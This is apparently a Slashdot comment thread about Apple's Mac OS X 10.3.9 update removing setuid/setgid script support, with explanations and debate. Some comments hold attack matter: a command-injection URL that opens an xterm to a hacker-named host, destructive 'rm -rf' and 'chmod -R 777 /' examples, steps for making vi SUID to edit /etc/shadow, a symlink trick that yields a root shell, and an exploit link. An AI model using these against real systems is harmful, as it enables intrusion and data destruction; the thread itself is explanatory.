It's not a Feature, It's a Vulnerability!

pmeunier writes "Apple's security stance is stunning. In the latest (10.3.9) update, Apple removed two capabilities because they pose security risks. One of them is the capability to run setuid and setguid scripts (the other was actually unused). Can other commercial OS vendors (how many are there :) adopt a similar stance? Will you be inconvenienced by the inability to run setuid scripts on MacOS X? Which other features/capabilities (in any OS) would you like to have removed?"

Stunning?

[Golias]

I guess I missed what was "stunning" about this.

Re:Stunning?

[soyle]

I guess I missed what was "stunning" about this.

Especially since IBM's AIX hasn't allowed SUID scripts since version 3.5.something...

Re:Stunning?

[0x461FAB0BD7D2]

If it's broken, it should be fixed, not thrown away.

Imagine if Microsoft just removed IE because of all the security problems....wait. Let me re-think my position on this.

Re:Stunning?

SUID/SGID works exactly as designed, it's inherently flawed by design, that is the problem.

Re:Stunning?

[0x461FAB0BD7D2]

Coincidentally, that's IE's problem too.

Re:Stunning?

You still don't get it. The problem is not that it is broken. The problem is that it works.

The correct "fix" is removal. Is there any way to make that more clear?

Weight the trade off

[amichalo]

It's all about looking at the trade off of system security vs. robustness. I don't know about SetUserID but if it makes my Mac less secure and doesn't allow my applications to do anything I need them to then shut 'er off.

The OS is already built with abilities to SUDO applications so perhaps Apple will figure out a more secure way of implementing the SetUserID feature so as not to create a vulerability. If they have to have it, then it probably needs to a an Admin level tool anyway.

Re:Weight the trade off

[Creepy]

First, this is about scripts, not setuid - if it removed setuid or setgid you wouldn't be able to sudo, since that is a setuid program.

Second, perl (a scripting language) has really led the way here - perl has not allowed for running of setuid and setgid in scripts for a long time.

Third, if you really need setuid and setgid to run your script, you can create a C wrapper for it. Yes, it's a pain, but it really emphasizes that you really know what you're doing. I remember seeing stuff like (fake URL) http://www.idioticmoron.org?command="runme.sh", which a smart hacker would see and convert to http://www.idioticmoron.org?command="runme.sh;env% 20DISPLAY=mycomputer.hacker.net:0.0%20xterm%20-sb% 20-sl10000" and have the cgi user's access (usually root) to your system with a convenient xterm (providing the machine is allowed as an xhost).

What is setuid and setgid? It runs the program as the owner (or group) of the program instead of the executor (the group ID is so the owner can run it with one set of permissions and the group a different set). In this way, you can have something like a counter that can be run by anyone but writes to a file that only that user can write to. To create such a file, you'd do something like chmod 4711 test.sh (setuid) or chmod 2711 test.sh (setgid). Since test.sh is a script (a shell script to be particular), this shouldn't be allowed now. A C program can call setuid and setgid internally, if it has permissions to (say, is running as root), so it can change the executor to the desired user or group and then run the script.

Re:Weight the trade off

[Creepy]

correction - perl doesn't allow running setuid or setgid when running as root (what most people use it for, anyway). You can setuid and setgid as other users, though only setgid is really useful, as far as I can tell.

not being able to run setuid or setgid as root means you can only hack the exploited user or group, not the entire OS.

Personally...

[mooniejohnson]

Personally, this doesn't affect me, but I see it as a reasonably smart move. Really, the only 100% effective way to seal a vulnerability is to take away whatever caused vulnerability in the first place. I'm sure there's a workaround so you still have the same functionality with some other, more secure, method.

Then again, I've never used this, I have no idea what I'm talking about, and I'm just exercising my Slashdot right to be opinionated!

no suid

[ignorant_newbie]

hmm.... while setuid is often used as a bad hack to avoid learning proper programming methodology ( like priv sep ) I'm not sure i like that they've taken it away completly. I prefer freebsd's approach ( but then... how often is that not true ? ) of making you mount the file system with a 'setuid' flag before you can run setuid scripts on it. since most apple users will never touch fstab ( or whatever their xml equiv is ) this would be a better approach.

Re:no suid

[javaxman]

Parent confuses setuid-executable with setuid-shell-script. Shell script setuid is a botch in general because shells are not designed to protect security when run with privileges and so are hoaxed into permitting a breakin.

The parent also didn't read the linked article:

Impact: Permitting SUID/SGID scripts to be installed could lead to privilege escalation.
Description: Mac OS X inherited the ability to run SUID/SGID scripts from FreeBSD. Apple does not distribute any SUID/SGID scripts, but the system would allow them to be installed or created. This update removes the ability of Mac OS X to run SUID/SGID scripts. Credit to Bruce Murphy of rattus.net and Justin Walker for reporting this issue.

emphasis mine. I'm going to guess shell scripts weren't the only kind of text file you could SUID/SGID ...

Please remove these ...

[EnronHaliburton2004]

Personally, I have had it with scripts which do dumb things as root, such as:

bar='' ### Mysteriously null! !@#!@%
FOO=/$bar
rm -rf $FOO

Or even something similar like this 'The engineer doesn't understand permissions' script:

chmod -R 777 /

Could you please remove those?

Thank god for applications like Netapp, which keep a readily availble copy of most directories in '$PWD/.snapshot . This has saved my ass a dozen times...

Re:Please remove these ...

[EnronHaliburton2004]

There's some marketing stuff here, but I can't find any technical guides:

http://www.netapp.com/products/software/snapshot.h tml

Basically, the Netapp takes a snapshot of your directories on a regular schedule (hourly, nightly, weekly, whereever). If you want to recover an old version of the file, it's as simple as a 'cp .snapshot/hourly.0/foobar.sh .'

Also, when you rm a file, the Netapp can put the removed file in a $PWD/.gone directory in case you removed it by accident, and removes the file later (1 day later, 7 days later, whatever you need).

Great features.

Derrrrrr....

[JHromadka]

Um, how about an explanation on what setuid and setguid actually does first, and then I'll tell you if I'm stunned.

Re:Derrrrrr....

It lets the program/application/script run as owner (setuid) of the file, or as the group (setguid). So you could have a program owned by root, and when it gets executed it runs as root, rather than being run as whoever executed it.

Re:Derrrrrr....

[mmkkbb]

they are pretty self-explanatory for user commands.

if the setuid bit on a file is set, then any execution of that file is done with the privileges the file's owner (or group in the case of setguid).

for example:

$ chmod 4754 foo.sh
$ ls -l foo.sh
-rwsr-xr-- 1 root foousers 17 Apr 18 15:11 foo.sh

Now anyone in wheel can run foo.sh with root privileges.

$ chmod 2755 foo.sh
$ ls -l foo.sh
-rwxr-sr-x 1 root foousers 0 Apr 18 15:11 foo.sh

Now anyone on the system can run foousers with the privileges of a foousers member.

Re:Derrrrrr....

[EnronHaliburton2004]

Now as an added bonus, look in your /bin directory and tell us which scripts have suid turned on. Now look for the suid bit on every file in your filesystem.

It won't be very easy to find the programs without a 'find' command.

Note that the only difference between a regular file and an suid-bit file is a teeny one-bit change-- there's an 's' instead of an 'x' or '-'. It's hard to see, and many people don't know it is when they see it.

Is that the sort of 'needle in a haystack' obsfucation that introduces all sorts of security issues.

Re:Derrrrrr....

[justMichael]

Now as an added bonus, look in your /bin directory and tell us which scripts have suid turned on. Now look for the suid bit on every file in your filesystem.

It won't be very easy to find the programs without a 'find' command.

Considering that it's OS X we are talking about, find is already there.

sudo find / -perm -6000 -ls

Will give you your list, not sure how many actually show up, I'll have to check when I get back in front of a Mac.

Re:Derrrrrr....

[and+by]

You probably actually want 'sudo find / -perm +6000 -ls'. That'll find all the files with not just both, but either SUID or SGID.

Answers

[hab136]

Can other commercial OS vendors (how many are there :) adopt a similar stance?

It'd be nice.

Will you be inconvenienced by the inability to run setuid scripts on MacOS X?

Not at all. SUID scripts are a huge hole. See What security problems exist with SUID scripts and programs? for an example. SUID scripts are usually created by lazy people who can't be bothered to figure out permissions.

Which other features/capabilities (in any OS) would you like to have removed?

I'd like to see the instant-flamewar generator removed.

Re:Answers

[fm6]

It'd be nice.

Hey, Microsoft is very active in hunting down and removing insecure features. Maybe not as active as they are in creating them....

including the function was a mistake.

[Malor]

The functionality was a mistake to include in the first place. I don't remember precisely WHY this is, but I have read that it is simply impossible to make a secure SUID/SGID script in any current flavor of Unix.

Taking it out will undoubtedly inconvenience some folks, but it's sort of like being given a power tool without some critical piece of safety gear. Apple has, in essence, forced you to install that gear on your power tool, like it or not. If it inconveniences you, then you weren't using the tool safely to begin with.

From what I understand, it's usually better to use sudo for this anyway... you can set up sudo so that it will only allow you to execute a particular program or set of programs. The sudoers file is more than slightly cryptic, and it's a bit more typing (both "sudo" and possibly the user password), but this will give you much better safety.

If you just absolutely can't stand doing it that way, then write your script in perl or C and SUID that version. Note that it takes special care in both instances... SUID programs are dangerous, and if someone cracks a user account on your system, that's going to be one of the first things they'll look at to try to get root. Don't just toss something together, go look up how to do it safely. (short form: don't trust your environment, don't trust user input). Perl has some special functions just for this purpose, so be sure to read its documentation carefully.

Re:including the function was a mistake.

[greed]

Well, you can at least mitigate some of the problems by starting your script with "-pe". The "p" flag disables use of the user's ENV setting and ~/.*rc files. And "-e" has it bail on error.

Most shells should give you -p behaviour on SUID or SGID anyway (no matter what account they S?ID to).

I always set both in my scripts; what's the use of seeing someone's alias table? And if they're one of those weird people who doesn't know the difference between .profile and .(ba|k|z|)shrc, well, I don't want their messed-up environment settings to hit my script--they're just going to complain my script is broken. That's at work, at home, it's more of a performance and safety thing--don't read files you don't need.

And stopping on error is always good. If you are testing for errors, then commands are allowed to fail without aborting the script. But unhandled errors kill it--so someone trying to blast junk into the script might cause it to die earlier.

Still, there are so many ways for environment settings to poison a script or the shell command line, S?ID is too dangerous. Using a few well-chosen "sudo" commands inside the script is the way to go. And, for batch jobs, you can set up those commands and the specific argument pattern to run without password prompt in sudo.

speaking of suid vulnerabilities

[baryon351]

Speaking of suid vulnerabilities, http://www.frsirt.com/exploits/20050123.fm-iSink.c .php is an exploit of the mrouter hole (an overflowable suid app in iSync) which allows local root access. Exploited in January, still unfixed in April.

Severity of course depends on how your system is used.

Linux doesn't allow it either

[�berhund]

Most (all?) Linux distros don't all this, either. Not sure where this happens, if it's bash or something deeper.

If you want to play, try making a script owned by root, which modifies something a normal user can't. Set it SUID (chmod u+s filename). Run it as a normal user. Shouldn't work (except on older OS/X).

Now, try setting vi or a copy of it SUID. (Again, make sure root owns it, and "chmod u+s filename".) Now run it as a normal user, and, say, edit your /etc/shadow. You shouldn't have any troubles doing so.

Now that you're done, get rid of those suid files so nobody else uses them.

Solaris already blocks SetUID shell scripts...

...unless you build your own shell from source.

seems like a "good thing" to me.

Re:Companies warning to NOT install the upgrade

[sRev]

I've now installed the update on 3 of my macs. The only real issue so far has been that one machine needed it's printers reset. On a "more annyoing" note, the update added an insane number of unwanted bookmarks and bookmark folders to Safari (NY Times, Mac.com, Amazon, eBay, etc.). I can't remember this happening after the installation of previous Safari updates. I hope this isn't a new trend.

Re:Ping

[Johnny+Mnemonic]

How would something like ping be handled ( I don't use OS X )?

Only applies to scripts, not to compiled executeables. So it wouldn't matter at all.

Re:Ping

[jwthompson2]

Ping is an application, not a script. Applications can still be SETUID but scripts cannot. Not being able to run applications SETUID would cause loads of hassles I suspect. But not being able to run scripts SETUID just keeps lazy scripters from doing stupid things that could compromise their systems.

This is a smart move by Apple

[commodoresloat]

And, since they did this, everything feels snappier!

Why this is a non-issue...

[argent]

TANJ, man, setuid scripts didn't even exist as a concept for most of UNIX lifetime, because scripts were run by the shell... not directly by the kernel: every program out there did something like:

if ( (pid = fork()) == 0 ) {
execl(program, program, filename, NULL);
/* exec failed, try it as a script */
execl("/bin/sh", "sh", program, filename, NULL);
/* panic! No shell! */
perror("/bin/sh");
exit(-1);
}
...

Obviously in this scenario, since /bin/sh isn't setuid, setuid scripts won't work. Until they came up with the "#!" hack in the '80s there wasn't even a mechanism by which setuid scripts could be implemented.

It didn't take long before it was obvious that setuid scripts were a REALLY bad idea, and they've been backed out of one UNIX version after another. this isn't a matter of redefining a feature as a bug, it's a matter of asking "what took you so long?"...

Whoever approved this story should be ashamed of themselves. There's more than enough REAL news that matters...

Re:Companies warning to NOT install the upgrade

[mshmgi]

I take it you haven't actually used Safari in a looong time. "COMMAND-/" toggles the status bar on/off.

Now, here's what ticked me off. They changed the "View Source" command from "COM-OPT-V" to "COM-OPT-U" for no apparent reason. That one had me really stumped for about 3 seconds this morning. Damn you Apple!!!!!

Rammed down our throats?

[j-turkey]

Something to think about is that anyone with root (on a Unix-esque system) can make a system insecure. This doesn't just apply to Unix, however. Anyone with super-user access to a system can demolish the security of any operating system, however. There are just too many things that can be done to leave nearly any system wide open.

There are also more than a few reasons to intentionally make a system insecure. Perhaps the system is part of a trusted network, with limited physical access. In that case, system security does not really matter much. Security also didn't matter much when the Internet/DARPAnet was designed -- a time and place issue.

While eliminating SUID/SGID scripts is probably a pretty good idea, I definitely want to retain the ability to make my own assessment of security and make the requisite changes to my system. Maybe there's a really good reason to have a TFTP, RSH, or Telnet server on a system.

Like I said, removing SUID/SGID scripts is probably a good thing, but I definitely want developers to be as cautious as possible in how they remove features. Perhaps rather than completely removing certain features, they should be disabled by default. My fear is that if this catches on with other developers, we could end up with quite a few systems like MacOS pre 10, where there is a definite lack of configuration (and hacking) options.

Don't get me wrong, I'm not bitching. Rather, I'm simply pointing out how this can go awry if it's unchecked.

Re:Rammed down our throats?

[greed]

Like I said, removing SUID/SGID scripts is probably a good thing, but I definitely want developers to be as cautious as possible in how they remove features. Perhaps rather than completely removing certain features, they should be disabled by default.

Disallowing SUID/SGID scripts is industry standard in UNIX-land. Not that "everyone else does it" is a good justification on its own. But, in this case "everyone else had a reason".

You can easily run a script as any ID you desire via sudo, provided with the system. As Apple states, none of their software uses SUID/SGID scripts. And I very much doubt any 3rd-party software does also. It is just such a universally unavailable feature, no UNIX programmer would think to even try it these days.

Is IE really a feature?

[theraccoon]

Which other features/capabilities (in any OS) would you like to have removed?

Internet Explorer.

Re:Stupid crap

[ArbitraryConstant]

It doesn't prevent lazy programmers and administrators from misusing SUID.

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define SCRIPT_PATH "/usr/local/bin/whatever"

int main (int argc, char *argv[]) {
execv(SCRIPT_PATH, argv);

fprintf("%s: could not execute \"%s\" (\"%s\")\n", argv[0], SCRIPT_PATH, strerror(errno));
}

Re:Stupid crap

[remahl]

Apple has not disabled suid. They have disabled suid scripts, a technique inherently unsafe. It is not possible to write a suid script in a secure manner. It is _difficult_ to write a secure suid binary, but far from impossible.

Answers : yes, no, where to start?

[javaxman]

Can other commercial OS vendors (how many are there :) adopt a similar stance?

they do, clearly. There are just too many examples of features dropped between releases of operating systems to pick only one.

Will you be inconvenienced by the inability to run setuid scripts on MacOS X?

no. It was a mistake that the feature was ever included. You should SUID/SGID binaries, not text files or anything else. Scripts are not binaries.

Which other features/capabilities (in any OS) would you like to have removed?

Can I vote for eliminating the ability of any OS to create annoying, non-standards-supporting web pages that use too much Flash and/or Javascript ? Can I prevent any OS from sending out spam email ? Can I remove the ability of a compiled application to crash the machine? No? Too bad. In any given system, there are a lot of features that aren't really needed and can be either a source of confusion or a source of problems. Most of these shouldn't be in the OS layer, and ( like the SUID issue ) should be tightened up if they are in that layer.

Fundamentally, though, the SUID/SGID thing referenced in the story is a non-issue. If I have console access, typing "sudo" and a password isn't even an inconvenience. It's already been pointed out that this feature has already been removed from almost every other major Un*x variant, including Linux.

The problem with suid scripts

[wirelessbuzzers]

Here's why IBM hasn't allowed them for ages.

The problem with suid scripts is the mechanism for implementing scripts. Essentially, a script is an executable beginning with

#!/path/to/interpreter arg

(arg is often left blank). When you run it,

scriptname arg1 arg2 arg3

is translated by the kernel to

/path/to/interpreter arg scriptname arg1 arg2 arg3

which is then executed. If the script is setuid, then logically the interpreter should be setuid.

Suppose then that you have a bash script /usr/local/bin/foo which is setuid root. If I create a symlink to it at /tmp/-i and set my path to include ".", then I can invoke it from tmp as "-i". The kernel translates this to

/bin/bash -i

run setuid root, which is a root login shell. D'oh.

Linux fixes this (if you turn on setuid scripts) with the /dev/fd/n system, that is, it opens the script as file descriptor 3 (say), and runs

/bin/bash /dev/fd/3

Still, this is a hack, and setuid scripts are bad for other reasons (environment poisoning, ...).

Re:The problem with suid scripts

[wirelessbuzzers]

Exactly. Because it is the kernel that parses the commandline options.

OK. If you want to be anal,
execv(scriptname, {scriptname, arg1, arg2, arg3, NULL}) is translated by the kernel to
execv(interpreter, {interpreter, arg, scriptname, arg1, arg2, arg3, NULL}).

Happy?

No it bloody won't.

[argent]

Yeah, people on other unices actually write scripts to do work. They get triggered, and run as user "oracle" or something like that.

Generally out of cron, which runs them as user oracle in a vanilla controlled environment, not whatever random or malicious environment some user running the scripts externally might set up.

. Instead, we'll get something worse: people writing binaries that SUID and execute any random shell script

Like sudo? For interactive work Mac OS X already has a mechanism to do this more safely, and for batch... well... if they're not already doing it for Linux systems that don't support setuid scripts, and didn't do it for UNIX before the brief life of setuid scripts, why would they start now?

Re:Stunningly *stupid*

1. It's not an important feature.

2. Even when it's used for what it's there for, it's being misused.

3. No competent sysadmin counts on it being there. Ever.

4. Most "real" flavors of *nix threw it away a long time ago.

If Apple is open to criticism, it's for not chucking it sooner.

Apple did not remove SUID/SGID on scripts

[Cmdr+TECO]

Apple added a kernel switch for suid/sgid on scripts, and leave it off by default. If you want suid/sgid scripts on your system, enable them. If you don't think this comment has given you enough information to enable them, you shouldn't be running suid/sgid scripts.

You asked for it....

[the+eric+conspiracy]

Which other features/capabilities (in any OS) would you like to have removed?"

Windows, all flavors, TCP/IP.

Re:Stunningly *stupid*

[YOU+LIKEWISE+FAIL+IT]

so even though many sysadmins count on such things

Bzzt. If you depend on such things, you should have your badge revoked. Setuid on scripts is a horrible hack, because the execution mechanism of shell scripts allows users to tinker with the internals of the suid resource.

This should never, ever, ever be allowed.

Re:Stunningly *stupid*

[snuffdiddy23]

I think that anything that makes a sysadmin's job more difficult should be reconsidered, as it requires a sysadmin to be more effective (which is uncalled for). Everyone who has ever worked in a job that is not as a sysadmin should know that making a sysadmin's life easier is way more important than the thousands of people they represent. Everyone knows that in any company that the IT department can be counted on being the top dollar earners. I have already made a list of excuses for my lack of efficacy, and this update that I had all of the computers automatically install has just taken precedence over some of the best excuses I have used to shirk off actual work.

Re:Companies warning to NOT install the upgrade

[NickFitz]

...the update added an insane number of unwanted bookmarks and bookmark folders to Safari... I hope this isn't a new trend.

No, it's a bug, according to Dave Hyatt, author of Safari.

Re:There are still OSes that do that?

[mveloso]

AIX supports it, up through at least 5L (last release I used).

You might have been using a system that used the "suppress suid/guid" mount option.